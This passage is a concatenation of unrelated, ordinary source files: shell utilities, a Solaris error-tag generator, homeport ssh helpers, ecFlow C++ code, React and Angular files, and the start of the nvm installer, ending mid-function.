        if (first) first = first->next;
        if (second) second = second->next;
    }
    // A leftover carry becomes one extra most-significant digit. temp is
    // only used here when the loop ran at least once, which is guaranteed
    // whenever carry > 0.
    if (carry > 0) temp->next = new Node(carry);
    // return head of the resultant list
    return res;
}
#!/bin/bash
# Configure the sleepi3 UPS: sample every 10 seconds and restore power at
# the voltage given via the THRESHOLD environment variable.
#
# Fix: $THRESHOLD was unquoted and unchecked; abort with a clear message
# when it is missing instead of passing an empty argument to sleepi3ctl.
: "${THRESHOLD:?THRESHOLD (restore voltage) must be set}"
sleepi3ctl set measurement-interval 10
sleepi3ctl set restore-voltage "$THRESHOLD"
|
#!/bin/bash
# Report Yandex.Disk status, force a sync, list the mirrored directory,
# and log a timestamped completion message.
yandex-disk status ; date ;
yandex-disk sync ; date ; ls -lh /home/ff/yd.master ; date ;
# Fix: $(date) was unquoted, so its output was word-split into separate
# echo arguments; quote it to pass the timestamp as one argument.
echo 'Main sync service task ended' '--' "$(date)" ;
|
#!/bin/sh
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License, Version 1.0 only
# (the "License"). You may not use this file except in compliance
# with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2003 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
#ident "%Z%%M% %I% %E% SMI"
# Legacy BSD-style echo flag: "-e" makes echo expand the \n and \t
# escapes embedded in the strings below.
BSDECHO=-e
echo ${BSDECHO} "\
/*\n\
* Copyright 2003 Sun Microsystems, Inc. All rights reserved.\n\
* Use is subject to license terms.\n\
*/\n\
\n\
#pragma ident\t\"%Z%%M%\t%I%\t%E% SMI\"\n\
\n\
#include <dt_errtags.h>
\n\
static const char *const _dt_errtags[] = {"
# Turn each "D_FOO," line read from stdin into a quoted string-table entry.
pattern='^ \(D_[A-Z0-9_]*\),*'
replace=' "\1",'
sed -n "s/$pattern/$replace/p" || exit 1
# Emit the closing brace plus a bounds-checked lookup helper for the
# generated table (index 0 is the fallback for out-of-range tags).
echo ${BSDECHO} "\
};\n\
\n\
static const int _dt_ntag = sizeof (_dt_errtags) / sizeof (_dt_errtags[0]);\n\
\n\
const char *
dt_errtag(dt_errtag_t tag)
{
return (_dt_errtags[(tag > 0 && tag < _dt_ntag) ? tag : 0]);
}"
exit 0
|
#!/bin/bash
# At the top of every module. This will gather a usage message to share with the
# user if we abend.
function homeport() {
    # Gather this module's usage text (piped in on stdin, NUL-terminated)
    # and publish it, dedented, as the global USAGE.
    [ "$1" == "module" ] || fail "invalid argument to homeport"
    local message; local spaces;
    # Read everything up to a NUL byte from stdin into $message.
    IFS="\000" read -r -d'\000' message && true
    # Compute the common leading-space prefix of the non-empty lines.
    # NOTE(review): the second sed program is a longest-common-prefix
    # idiom; assumed correct — verify before changing.
    spaces=$(
        echo "$message" | sed -e '/^$/d' -e 's/^\( *\).*/\1/' | \
            sed -e '1h;H;g;s/[^\n]/#/g;s/\(#*\)\n\1/\n/;G;/^\n/s/\n.*\n\(.*\)\n.*/\1/;s/.*\n//;h;$!d'
    )
    # Strip that common indentation from every line.
    USAGE="$(echo "$message" | sed -e "s/^$spaces//")"
}
# TODO: Not used.
function homeport_absolutize() {
    # Resolve $1 to an absolute "dir/base" path.
    #
    # Fix: the original used ${1/*}, which deletes the entire value (the
    # pattern `*` matches the whole string) and made this `cd ""`;
    # ${1%/*} (strip the basename) is the intended directory.
    expanded=$(cd ${1%/*} && homeport_readlink $1)
    # Debug output on stderr; left in place since this helper is unused.
    readlink $1 1>&2
    echo x $expanded 1>&2
    base=${expanded##*/}
    dir=$(cd ${expanded%/*} && pwd -P)
    echo "$dir/$base"
}
function usage() {
    # Print the collected usage text (set by homeport) and terminate the
    # process with the supplied exit status.
    echo "$USAGE"
    exit "${1}"
}
function abend() {
    # Report a fatal error, show usage, and exit with status 1.
    #
    # Fix: the error message previously went to stdout; diagnostics
    # belong on stderr so they are not captured by command substitution.
    local message=$1
    echo "error: $message" >&2
    usage 1
}
function homeport_get_hops_and_tag() {
    # Collect leading "user@host[:port]" hop arguments into the global
    # homeport_hops array, then delegate the rest to homeport_get_tag.
    #
    # Fix: the initialization was misspelled `hompeort_hops=()`, so
    # homeport_hops was never reset between calls.
    homeport_hops=()
    while [ $# -ne 0 ]; do
        if [[ "$1" = *@* ]]; then
            homeport_hops+=("$1")
            shift
        else
            break
        fi
    done
    homeport_get_tag "$@"
}
function homeport_get_tag() {
    # Parse "[user@]tag [command...]" and publish the derived globals:
    # homeport_tag, homeport_unix_user, homeport_image,
    # homeport_home_container, homeport_container, homeport_argv.
    [ -z "$1" ] && abend "Tag name required"
    homeport_tag=$1
    shift
    if [[ "$homeport_tag" = *@* ]]; then
        # A "user@tag" form overrides the default unix user.
        homeport_unix_user=${homeport_tag%@*}
        homeport_tag=${homeport_tag#*@}
    else
        homeport_unix_user=$USER
    fi
    homeport_image="homeport/image-${homeport_tag}"
    homeport_home_container="homeport-home-${homeport_unix_user}"
    homeport_container="homeport-${homeport_tag}"
    if [ $# -eq 0 ]; then
        homeport_argv=''
    else
        # Shell-quote the remaining arguments (%q) so they can later be
        # re-parsed as individual words.
        printf -v homeport_argv ' %q' "$@"
    fi
}
function homeport_select_image() {
    # Set the image/container globals for a bare tag. Unlike
    # homeport_get_tag this performs no user@ handling or argv capture.
    [ -z "$1" ] && abend "Tag name required"
    homeport_tag=$1
    homeport_image="homeport/image-${homeport_tag}"
    homeport_container="homeport-${homeport_tag}"
}
function homeport_ssh_config() {
    # Build an ssh configuration directory ($1) that reaches the homeport
    # container, optionally tunnelling through the hops collected in the
    # homeport_hops array.
    dir=$1
    fetch=
    if [ ${#homeport_hops[@]} -eq 0 ]; then
        touch "$dir/config"
    else
        # Chain one "ssh -A" per hop; $fetch is used both to fetch the
        # known-hosts line below and as the ProxyCommand.
        separator=
        for hop in "${homeport_hops[@]}"; do
            fetch+=$separator
            separator=' '
            ssh_host=${hop#*@}
            ssh_port=${ssh_host#*:}
            if [ "$ssh_port" = "$ssh_host" ]; then
                ssh_port=22   # no :port suffix; use the ssh default
            fi
            ssh_host=${ssh_host%:*}
            ssh_user=${hop%@*}
            fetch+="ssh -A -p $ssh_port -l $ssh_user $ssh_host"
        done
        # Fix: this assignment previously carried a stray `>> "$dir/config"`
        # redirection, which only opened the file and wrote nothing; the
        # value is actually appended at the end of this function.
        proxy_command="ProxyCommand $fetch -W %h:%p 2> /dev/null"
    fi
    homeport_known_hosts=$(homeport_evaluatable known-hosts $homeport_tag | $fetch bash 2> /dev/null)
    # Extract "host:port" from a "[1.2.3.4]:2222 ..." known-hosts entry.
    IFS=: read -ra destination <<< "$(echo "$homeport_known_hosts" | sed 's/\[\([0-9.]*\)\]:\([0-9]*\).*/\1:\2/')"
    echo "$homeport_known_hosts" > "$dir/known_hosts"
    echo "Host ${destination[0]}" >> "$dir/config"
    echo "Port ${destination[1]}" >> "$dir/config"
    echo "UserKnownHostsFile $dir/known_hosts" >> "$dir/config"
    echo "$proxy_command" >> "$dir/config"
}
|
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
// Name :
// Author : Avi
// Revision : $Revision: #18 $
//
// Copyright 2009-2020 ECMWF.
// This software is licensed under the terms of the Apache Licence version 2.0
// which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
// In applying this licence, ECMWF does not waive the privileges and immunities
// granted to it by virtue of its status as an intergovernmental organisation
// nor does it submit to any jurisdiction.
//
// Description :
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
#include "GroupSTCCmd.hpp"
#include "ClientToServerCmd.hpp"
#include "Defs.hpp"
#include "Log.hpp"
#include "PrintStyle.hpp"
#include "WhyCmd.hpp"
#include "Task.hpp"
#include "Family.hpp"
#include "Suite.hpp"
using namespace ecf;
using namespace std;
using namespace boost;
std::string GroupSTCCmd::print() const
{
   // Short identifier used when logging/tracing this command.
   static const char* kName = "cmd:GroupSTCCmd";
   return kName;
}
bool GroupSTCCmd::equals(ServerToClientCmd* rhs) const
{
   // Two group commands are equal when they hold the same number of
   // children, each corresponding pair of children compares equal, and
   // the base-class state matches.
   auto* other = dynamic_cast< GroupSTCCmd* >(rhs);
   if (other == nullptr) return false;

   const std::vector<STC_Cmd_ptr>& otherCmds = other->cmdVec();
   const size_t count = cmdVec_.size();
   if (count != otherCmds.size()) return false;

   size_t i = 0;
   while (i < count) {
      if (!cmdVec_[i]->equals(otherCmds[i].get())) return false;
      ++i;
   }
   return ServerToClientCmd::equals(rhs);
}
bool GroupSTCCmd::handle_server_response( ServerReply& server_reply, Cmd_ptr cts_cmd, bool debug ) const
{
   if (debug) std::cout << " GroupSTCCmd::handle_server_response\n";
   // Let every child process the reply; remember any failure but still
   // give the remaining children a chance to run.
   bool ret_flag = true;
   for(STC_Cmd_ptr subCmd: cmdVec_) {
      if (!subCmd->handle_server_response(server_reply, cts_cmd, debug)) ret_flag = false; // one of the commands failed
   }
   // Everything below only applies to the command-line client.
   if (!server_reply.cli()) return ret_flag;
   /// CLI called from the command line.
   /// This assumes the DefsCmd::handle_server_response() | SNodeCmd::handle_server_response has been called
   /// this will populate ServerReply with the defs/node returned from the server
   defs_ptr defs = server_reply.client_defs();
   node_ptr node = server_reply.client_node();
   if ( defs.get() || node.get() ) {
      if (debug) std::cout << " GroupSTCCmd::handle_server_response *get* | *sync* | *sync_full* called\n";
      /// client --group="get; show" # where get will call DefsCmd will return defs, from the server
      /// client --group="get; show state" # where get will call DefsCmd will return defs, from the server
      /// client --group="get /s1; show state" # where get will call DefsCmd will return defs, from the server
      /// client --group="sync_full; show" # similar to get return defs, from the server
      /// client --group="sync 1 0 0; show" # where sync will call SyncCmd will return defs, from the server
      /// # will return those suites with handle 1
      // Print out the data that was received from server. as a part of get request.
      // The server cannot do a show, it MUST be done at the Client side
      // The show request is only valid if the out bound request to the server
      PrintStyle::Type_t style = cts_cmd->show_style();
      if ( style != PrintStyle::NOTHING ) {
         if (debug) std::cout << " GroupSTCCmd::handle_server_response *show* was called " << PrintStyle::to_string(style) << "\n";
         // RAII-style holder: applies the style for the scope of printing.
         PrintStyle print_style(style);
         if (defs.get()) {
            /// Auto generate externs, before writing to standard out. This can be expensive since
            /// All the trigger references need to to be resolved. & AST need to be created first
            /// The old spirit based parsing is horrendously, slow. Can't use Spirit QI, till IBM support it
            if (!PrintStyle::is_persist_style(cts_cmd->show_style())) {
               defs->auto_add_externs();
            }
            std::cout << *defs.get();
         }
         else {
            // Only one of suite/family/task will match; print whichever
            // concrete node type was returned.
            if (node.get()) {
               Suite* suite = node->isSuite();
               if (suite) std::cout << *suite << "\n";
               Family* fam = node->isFamily();
               if (fam) std::cout << *fam << "\n";
               Task* task = node->isTask();
               if (task) std::cout << *task << "\n";
            }
         }
      }
   }
   // Handle a trailing "why" sub-command against the returned defs.
   std::string nodePath;
   if (cts_cmd->why_cmd(nodePath) && defs.get()) {
      if (debug) std::cout << " GroupSTCCmd::handle_server_response *why* was called\n";
      /// client --group="get; why" # where get will call DefsCmd will return defs, from the server
      /// client --group="get; why <path>" # where get will call DefsCmd will return defs, from the server
      WhyCmd cmd(defs, nodePath);
      std::cout << cmd.why() << "\n";
   }
   return ret_flag;
}
void GroupSTCCmd::addChild(STC_Cmd_ptr childCmd)
{
   // Append a sub-command to the group. Null children are rejected up
   // front so iteration in the other members can stay unchecked.
   LOG_ASSERT(childCmd.get(),""); // Dont add NULL children
   cmdVec_.push_back(childCmd);
}
// these two must be opposite of each other
bool GroupSTCCmd::ok() const
{
   // The group is ok only when every child reports ok; a child that is
   // an ErrorCmd returns false.
   for (size_t idx = 0; idx < cmdVec_.size(); ++idx) {
      if (!cmdVec_[idx]->ok()) {
         return false;
      }
   }
   return true;
}
void GroupSTCCmd::cleanup()
{
   /// After the command has run, give each child a chance to reclaim memory.
   for (size_t idx = 0; idx < cmdVec_.size(); ++idx) {
      cmdVec_[idx]->cleanup();
   }
}
std::string GroupSTCCmd::error() const
{
   // Concatenate the error text of every failed child, one per line;
   // children without errors contribute nothing.
   std::string combined;
   for (size_t idx = 0; idx < cmdVec_.size(); ++idx) {
      const std::string childError = cmdVec_[idx]->error();
      if (childError.empty()) continue;
      combined += childError;
      combined += "\n";
   }
   return combined;
}
// Stream the short command identifier produced by print().
std::ostream& operator<<(std::ostream& os, const GroupSTCCmd& c)
{
   return os << c.print();
}
|
import {connect} from "react-redux";
import Warzone from "../components/Warzone";
import {TOAST_SHOW} from "../actions/toasts";
import {ACTIVE_USER_SWAP, USER_CLEAR_ACTIVE} from "../actions/users";
import {SWITCH_MOVE} from "../actions/switch";
// Map the relevant slices of the redux store onto Warzone's props.
const mapStateToProps = ({users, globalState, switchButton, coalitions}) => ({
    users,
    user_metadata: users.user_metadata,
    mode: globalState.mode,
    switchButton: {
        position: switchButton.position
    },
    coalitions: coalitions.coalitions
});

// Expose the action dispatchers Warzone needs as callback props.
const mapDispatchToProps = dispatch => ({
    showToast: payload => dispatch({type: TOAST_SHOW, payload}),
    storeActiveUsers: payload => dispatch({type: ACTIVE_USER_SWAP, payload}),
    moveSwitch: payload => dispatch({type: SWITCH_MOVE, payload}),
    clearActiveUser: () => dispatch({type: USER_CLEAR_ACTIVE}),
});

export default connect(mapStateToProps, mapDispatchToProps)(Warzone);
|
import { TestBed } from '@angular/core/testing';
import { RouterTestingModule } from '@angular/router/testing';
import { ActivatedRoute } from '@angular/router';
import { By } from '@angular/platform-browser';
import { Observable } from 'rxjs/Observable';
import { AppModule } from '../app.module';
import { LiveComponent } from './live.component';
import { RaceService } from '../race.service';
import { PonyComponent } from '../pony/pony.component';
describe('LiveComponent', () => {
  // Stubbed RaceService: `get` resolves a fixed race, `live` emits an
  // empty position list by default.
  const fakeRaceService = jasmine.createSpyObj('RaceService', ['get', 'live']);
  fakeRaceService.get.and.returnValue(Observable.of({
    id: 1,
    name: 'Lyon',
    ponies: [],
    startInstant: '2016-02-18T08:02:00Z'
  }));
  fakeRaceService.live.and.returnValue(Observable.of([]));
  // Route stub exposing the raceId the component reads from the snapshot.
  const fakeActivatedRoute = { snapshot: { params: { raceId: 1 } } };
  beforeEach(() => TestBed.configureTestingModule({
    imports: [AppModule, RouterTestingModule],
    providers: [
      { provide: RaceService, useValue: fakeRaceService },
      { provide: ActivatedRoute, useValue: fakeActivatedRoute }
    ]
  }));
  it('should display the title', () => {
    const fixture = TestBed.createComponent(LiveComponent);
    fixture.detectChanges();
    const element = fixture.nativeElement;
    const title = element.querySelector('h2');
    expect(title).not.toBeNull('The template should display an h2 element with the race name inside');
    expect(title.textContent).toContain('Lyon', 'The template should display an h2 element with the race name inside');
  });
  it('should subscribe to the live observable', () => {
    const fixture = TestBed.createComponent(LiveComponent);
    fixture.detectChanges();
    const liveComponent: LiveComponent = fixture.componentInstance;
    expect(fakeRaceService.live).toHaveBeenCalledWith(1);
    expect(liveComponent.poniesWithPosition).not.toBeNull('poniesWithPosition should be initialized in the subscribe');
    expect(liveComponent.positionSubscription).not.toBeNull('positionSubscription should store the subscription');
  });
  it('should unsubscribe on destruction', () => {
    const fixture = TestBed.createComponent(LiveComponent);
    fixture.detectChanges();
    const liveComponent: LiveComponent = fixture.componentInstance;
    spyOn(liveComponent.positionSubscription, 'unsubscribe');
    liveComponent.ngOnDestroy();
    expect(liveComponent.positionSubscription.unsubscribe).toHaveBeenCalled();
  });
  it('should display a div with a pony component per pony', () => {
    const fixture = TestBed.createComponent(LiveComponent);
    fixture.detectChanges();
    const liveComponent: LiveComponent = fixture.componentInstance;
    // Inject positions directly to exercise the template bindings.
    liveComponent.poniesWithPosition = [
      { id: 1, name: '<NAME>', color: 'BLUE', position: 10 },
      { id: 2, name: '<NAME>', color: 'Green', position: 40 }
    ];
    fixture.detectChanges();
    const element = fixture.nativeElement;
    const divWithPonies = element.querySelectorAll('div.pony-wrapper');
    expect(divWithPonies.length).toBe(2, 'You should display a `div` with a class `pony-wrapper` for each pony');
    const debugElement = fixture.debugElement;
    const ponyComponents = debugElement.queryAll(By.directive(PonyComponent));
    expect(ponyComponents).not.toBeNull('You should display a `PonyComponent` for each pony');
    expect(ponyComponents.length).toBe(2, 'You should display a `PonyComponent` for each pony');
    const sunnySunday = ponyComponents[0];
    expect(sunnySunday.componentInstance.isRunning).toBeTruthy('Each pony should be running (use the `isRunning` input)');
    const sunnySundayDiv = divWithPonies[0];
    expect(sunnySundayDiv.getAttribute('style')).toBe('margin-left: 0%;',
      'The `margin-left` style should match the pony\'s position in percent minus 10');
  });
});
|
#!/usr/bin/env bash
{ # this ensures the entire script is downloaded #
# Returns 0 if the given name resolves to a command/function/builtin in the
# current shell, non-zero otherwise; all `type` output is discarded.
nvm_has() {
type "$1" > /dev/null 2>&1
}
# Prints the default nvm install location: $XDG_CONFIG_HOME/nvm when
# XDG_CONFIG_HOME is set and non-empty, otherwise $HOME/.nvm.
nvm_default_install_dir() {
  if [ -n "${XDG_CONFIG_HOME-}" ]; then
    printf %s "${XDG_CONFIG_HOME}/nvm"
  else
    printf %s "${HOME}/.nvm"
  fi
}
# Prints the directory nvm should be installed into: a pre-set $NVM_DIR when
# available, otherwise nvm_default_install_dir.
# Uses ${NVM_DIR-} so the check cannot trip `set -u` in callers' shells.
nvm_install_dir() {
  if [ -n "${NVM_DIR-}" ]; then
    printf %s "${NVM_DIR}"
  else
    nvm_default_install_dir
  fi
}
# Prints the pinned nvm release tag this installer fetches.
nvm_latest_version() {
  printf '%s\n' "v0.37.2"
}
# Succeeds (0) when the given profile path ends in /.bashrc, /.bash_profile
# or /.zshrc; fails (1) for anything else, including an empty argument.
nvm_profile_is_bash_or_zsh() {
  local PROFILE_PATH
  PROFILE_PATH="${1-}"
  case "${PROFILE_PATH}" in
    */.bashrc) return 0 ;;
    */.bash_profile) return 0 ;;
    */.zshrc) return 0 ;;
  esac
  return 1
}
#
# Prints the download/clone URL for the requested install method ($1).
# A pre-set $NVM_SOURCE overrides everything except the two helper-script
# methods ("script-nvm-exec" and "script-nvm-bash-completion").
# Returns 1 on an unrecognized method.
#
nvm_source() {
  local NVM_GIT_TAG
  NVM_GIT_TAG="$(nvm_latest_version)"
  local NVM_SOURCE_URL
  NVM_SOURCE_URL="$NVM_SOURCE"
  case "_${1-}" in
    _script-nvm-exec)
      NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/${NVM_GIT_TAG}/nvm-exec"
      ;;
    _script-nvm-bash-completion)
      NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/${NVM_GIT_TAG}/bash_completion"
      ;;
    *)
      # $NVM_SOURCE wins for the remaining methods; only fall back to the
      # defaults when it is empty.
      if [ -z "$NVM_SOURCE_URL" ]; then
        case "_${1-}" in
          _script)
            NVM_SOURCE_URL="https://raw.githubusercontent.com/nvm-sh/nvm/${NVM_GIT_TAG}/nvm.sh"
            ;;
          _git | _)
            NVM_SOURCE_URL="https://github.com/nvm-sh/nvm.git"
            ;;
          *)
            echo >&2 "Unexpected value \"${1-}\" for \$NVM_METHOD"
            return 1
            ;;
        esac
      fi
      ;;
  esac
  echo "$NVM_SOURCE_URL"
}
#
# Prints the Node.js version requested via $NODE_VERSION (may be empty).
#
nvm_node_version() {
  printf '%s\n' "${NODE_VERSION}"
}
# Fetches a URL with curl when available, else with wget after translating
# the curl-style flags to wget equivalents. All arguments are passed through
# curl-style. Returns non-zero if neither curl nor wget is installed.
nvm_download() {
if nvm_has "curl"; then
curl --compressed -q "$@"
elif nvm_has "wget"; then
# Emulate curl with wget
ARGS=$(echo "$*" | command sed -e 's/--progress-bar /--progress=bar /' \
-e 's/-L //' \
-e 's/--compressed //' \
-e 's/-I /--server-response /' \
-e 's/-s /-q /' \
-e 's/-o /-O /' \
-e 's/-C - /-c /')
# shellcheck disable=SC2086
# eval re-splits the rewritten flag string into words;
# NOTE(review): this breaks on URLs/paths containing spaces — known tradeoff
eval wget $ARGS
fi
}
# Clone or update nvm in the install dir via git, pinned to the tag from
# nvm_latest_version, then delete any stray local master branch and compact
# the repository. Exits the script (1 or 2) on git failures.
install_nvm_from_git() {
  local INSTALL_DIR
  INSTALL_DIR="$(nvm_install_dir)"
  if [ -d "$INSTALL_DIR/.git" ]; then
    # Existing clone: just fetch the pinned release tag.
    echo "=> nvm is already installed in $INSTALL_DIR, trying to update using git"
    command printf '\r=> '
    command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" fetch origin tag "$(nvm_latest_version)" --depth=1 2> /dev/null || {
      echo >&2 "Failed to update nvm, run 'git fetch' in $INSTALL_DIR yourself."
      exit 1
    }
  else
    # Cloning to $INSTALL_DIR
    echo "=> Downloading nvm from git to '$INSTALL_DIR'"
    command printf '\r=> '
    mkdir -p "${INSTALL_DIR}"
    if [ "$(ls -A "${INSTALL_DIR}")" ]; then
      # Directory already has content: cannot clone into it, so init a repo
      # in place, point origin at the nvm source, and fetch the tag.
      command git init "${INSTALL_DIR}" || {
        echo >&2 'Failed to initialize nvm repo. Please report this!'
        exit 2
      }
      command git --git-dir="${INSTALL_DIR}/.git" remote add origin "$(nvm_source)" 2> /dev/null \
        || command git --git-dir="${INSTALL_DIR}/.git" remote set-url origin "$(nvm_source)" || {
        echo >&2 'Failed to add remote "origin" (or set the URL). Please report this!'
        exit 2
      }
      command git --git-dir="${INSTALL_DIR}/.git" fetch origin tag "$(nvm_latest_version)" --depth=1 || {
        echo >&2 'Failed to fetch origin with tags. Please report this!'
        exit 2
      }
    else
      # Empty directory: shallow clone directly at the pinned tag.
      command git -c advice.detachedHead=false clone "$(nvm_source)" -b "$(nvm_latest_version)" --depth=1 "${INSTALL_DIR}" || {
        echo >&2 'Failed to clone nvm repo. Please report this!'
        exit 2
      }
    fi
  fi
  # Check out the pinned tag (detached HEAD, warning suppressed).
  command git -c advice.detachedHead=false --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" checkout -f --quiet "$(nvm_latest_version)"
  # Remove a leftover local master branch, falling back for old git versions.
  if [ -n "$(command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" show-ref refs/heads/master)" ]; then
    if command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch --quiet 2>/dev/null; then
      command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch --quiet -D master >/dev/null 2>&1
    else
      echo >&2 "Your version of git is out of date. Please update it!"
      command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" branch -D master >/dev/null 2>&1
    fi
  fi
  echo "=> Compressing and cleaning up git repository"
  if ! command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" reflog expire --expire=now --all; then
    echo >&2 "Your version of git is out of date. Please update it!"
  fi
  if ! command git --git-dir="$INSTALL_DIR"/.git --work-tree="$INSTALL_DIR" gc --auto --aggressive --prune=now ; then
    echo >&2 "Your version of git is out of date. Please update it!"
  fi
  return
}
#
# Automatically install Node.js
#
# No-op when $NODE_VERSION is unset/empty; otherwise installs that version
# with the freshly sourced `nvm` and verifies it became the current version.
nvm_install_node() {
  local NODE_VERSION_LOCAL
  NODE_VERSION_LOCAL="$(nvm_node_version)"
  if [ -z "$NODE_VERSION_LOCAL" ]; then
    return 0
  fi
  echo "=> Installing Node.js version $NODE_VERSION_LOCAL"
  nvm install "$NODE_VERSION_LOCAL"
  local CURRENT_NVM_NODE
  CURRENT_NVM_NODE="$(nvm_version current)"
  # Compare the resolved target version against what nvm now reports as
  # current to confirm the install actually took effect.
  if [ "$(nvm_version "$NODE_VERSION_LOCAL")" == "$CURRENT_NVM_NODE" ]; then
    echo "=> Node.js version $NODE_VERSION_LOCAL has been successfully installed"
  else
    echo >&2 "Failed to install Node.js $NODE_VERSION_LOCAL"
  fi
}
# Download nvm.sh, nvm-exec and bash_completion in parallel into the install
# dir, then mark nvm-exec executable. Returns non-zero if any download or
# the chmod fails.
install_nvm_as_script() {
  local INSTALL_DIR
  INSTALL_DIR="$(nvm_install_dir)"
  local NVM_SOURCE_LOCAL
  NVM_SOURCE_LOCAL="$(nvm_source script)"
  local NVM_EXEC_SOURCE
  NVM_EXEC_SOURCE="$(nvm_source script-nvm-exec)"
  local NVM_BASH_COMPLETION_SOURCE
  NVM_BASH_COMPLETION_SOURCE="$(nvm_source script-nvm-bash-completion)"
  # Downloading to $INSTALL_DIR
  mkdir -p "$INSTALL_DIR"
  if [ -f "$INSTALL_DIR/nvm.sh" ]; then
    echo "=> nvm is already installed in $INSTALL_DIR, trying to update the script"
  else
    echo "=> Downloading nvm as script to '$INSTALL_DIR'"
  fi
  # The three downloads run as background jobs. Each `|| { ...; return N; }`
  # executes inside its background subshell, so the real failure propagation
  # happens in the `wait "$job" || return $?` loop below.
  nvm_download -s "$NVM_SOURCE_LOCAL" -o "$INSTALL_DIR/nvm.sh" || {
    echo >&2 "Failed to download '$NVM_SOURCE_LOCAL'"
    return 1
  } &
  nvm_download -s "$NVM_EXEC_SOURCE" -o "$INSTALL_DIR/nvm-exec" || {
    echo >&2 "Failed to download '$NVM_EXEC_SOURCE'"
    return 2
  } &
  nvm_download -s "$NVM_BASH_COMPLETION_SOURCE" -o "$INSTALL_DIR/bash_completion" || {
    echo >&2 "Failed to download '$NVM_BASH_COMPLETION_SOURCE'"
    return 2
  } &
  # Reap every background download and propagate the first failure.
  for job in $(jobs -p | command sort)
  do
    wait "$job" || return $?
  done
  chmod a+x "$INSTALL_DIR/nvm-exec" || {
    echo >&2 "Failed to mark '$INSTALL_DIR/nvm-exec' as executable"
    return 3
  }
}
# Echoes the candidate profile path iff the argument is non-empty and names
# an existing regular file; otherwise stays silent and returns 1.
nvm_try_profile() {
  local CANDIDATE
  CANDIDATE="${1-}"
  if [ -n "${CANDIDATE}" ] && [ -f "${CANDIDATE}" ]; then
    echo "${CANDIDATE}"
    return 0
  fi
  return 1
}
#
# Detect profile file if not specified as environment variable
# (eg: PROFILE=~/.myprofile)
# The echo'ed path is guaranteed to be an existing file
# Otherwise, an empty string is returned
#
# Resolution order: $PROFILE=/dev/null opts out entirely; an existing
# $PROFILE wins; then the file matching the running shell ($BASH_VERSION /
# $ZSH_VERSION); finally the first existing file among the common profiles.
nvm_detect_profile() {
  if [ "${PROFILE-}" = '/dev/null' ]; then
    # the user has specifically requested NOT to have nvm touch their profile
    return
  fi
  # NOTE(review): this reads ${PROFILE} unguarded — would trip `set -u` in a
  # caller's shell, unlike the ${PROFILE-} test above.
  if [ -n "${PROFILE}" ] && [ -f "${PROFILE}" ]; then
    echo "${PROFILE}"
    return
  fi
  local DETECTED_PROFILE
  DETECTED_PROFILE=''
  if [ -n "${BASH_VERSION-}" ]; then
    if [ -f "$HOME/.bashrc" ]; then
      DETECTED_PROFILE="$HOME/.bashrc"
    elif [ -f "$HOME/.bash_profile" ]; then
      DETECTED_PROFILE="$HOME/.bash_profile"
    fi
  elif [ -n "${ZSH_VERSION-}" ]; then
    DETECTED_PROFILE="$HOME/.zshrc"
  fi
  if [ -z "$DETECTED_PROFILE" ]; then
    # Shell-specific detection failed; fall back to the first existing file.
    for EACH_PROFILE in ".profile" ".bashrc" ".bash_profile" ".zshrc"
    do
      if DETECTED_PROFILE="$(nvm_try_profile "${HOME}/${EACH_PROFILE}")"; then
        break
      fi
    done
  fi
  if [ -n "$DETECTED_PROFILE" ]; then
    echo "$DETECTED_PROFILE"
  fi
}
#
# Check whether the user has any globally-installed npm modules in their system
# Node, and warn them if so.
#
nvm_check_global_modules() {
  # Nothing to warn about when npm is absent or reports a bogus version.
  command -v npm >/dev/null 2>&1 || return 0
  local NPM_VERSION
  NPM_VERSION="$(npm --version)"
  NPM_VERSION="${NPM_VERSION:--1}"
  # Strip everything after the leading digits; bail unless it is a positive number.
  [ "${NPM_VERSION%%[!-0-9]*}" -gt 0 ] || return 0
  local NPM_GLOBAL_MODULES
  # Global module list minus npm itself and placeholder "(empty)" lines.
  NPM_GLOBAL_MODULES="$(
    npm list -g --depth=0 |
    command sed -e '/ npm@/d' -e '/ (empty)$/d'
  )"
  local MODULE_COUNT
  MODULE_COUNT="$(
    command printf %s\\n "$NPM_GLOBAL_MODULES" |
    command sed -ne '1!p' | # Remove the first line
    wc -l | command tr -d ' ' # Count entries
  )"
  if [ "${MODULE_COUNT}" != '0' ]; then
    # shellcheck disable=SC2016
    echo '=> You currently have modules installed globally with `npm`. These will no'
    # shellcheck disable=SC2016
    echo '=> longer be linked to the active version of Node when you install a new node'
    # shellcheck disable=SC2016
    echo '=> with `nvm`; and they may (depending on how you construct your `$PATH`)'
    # shellcheck disable=SC2016
    echo '=> override the binaries of modules installed with `nvm`:'
    echo
    command printf %s\\n "$NPM_GLOBAL_MODULES"
    echo '=> If you wish to uninstall them at a later point (or re-install them under your'
    # shellcheck disable=SC2016
    echo '=> `nvm` Nodes), you can remove them from the system Node as follows:'
    echo
    echo ' $ nvm use system'
    echo ' $ npm uninstall -g a_module'
    echo
  fi
}
#######################################
# Main driver: validates/creates $NVM_DIR, installs nvm via git or raw
# script download, wires the nvm source lines into the user's shell
# profile, loads nvm, and optionally installs $NODE_VERSION.
# Exits non-zero on any unrecoverable setup problem.
#######################################
nvm_do_install() {
  if [ -n "${NVM_DIR-}" ] && ! [ -d "${NVM_DIR}" ]; then
    if [ -e "${NVM_DIR}" ]; then
